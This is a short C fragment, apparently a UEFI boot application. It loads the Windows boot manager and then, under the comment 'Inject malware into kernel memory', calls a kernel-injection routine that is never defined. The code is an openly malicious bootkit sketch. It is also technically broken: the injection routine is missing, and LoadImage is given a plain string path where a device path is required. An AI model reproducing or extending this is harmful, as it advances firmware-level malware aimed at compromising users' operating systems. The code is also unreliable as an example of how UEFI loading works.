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&lt;efi.h&gt;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&lt;efilib.h&gt;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EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)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InitializeLib(ImageHandle, SystemTable);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CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";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SystemTable-&gt;BootServices-&gt;LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);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// Inject malware into kernel memory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InjectCodeIntoKernel();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return EFI_SUCCESS;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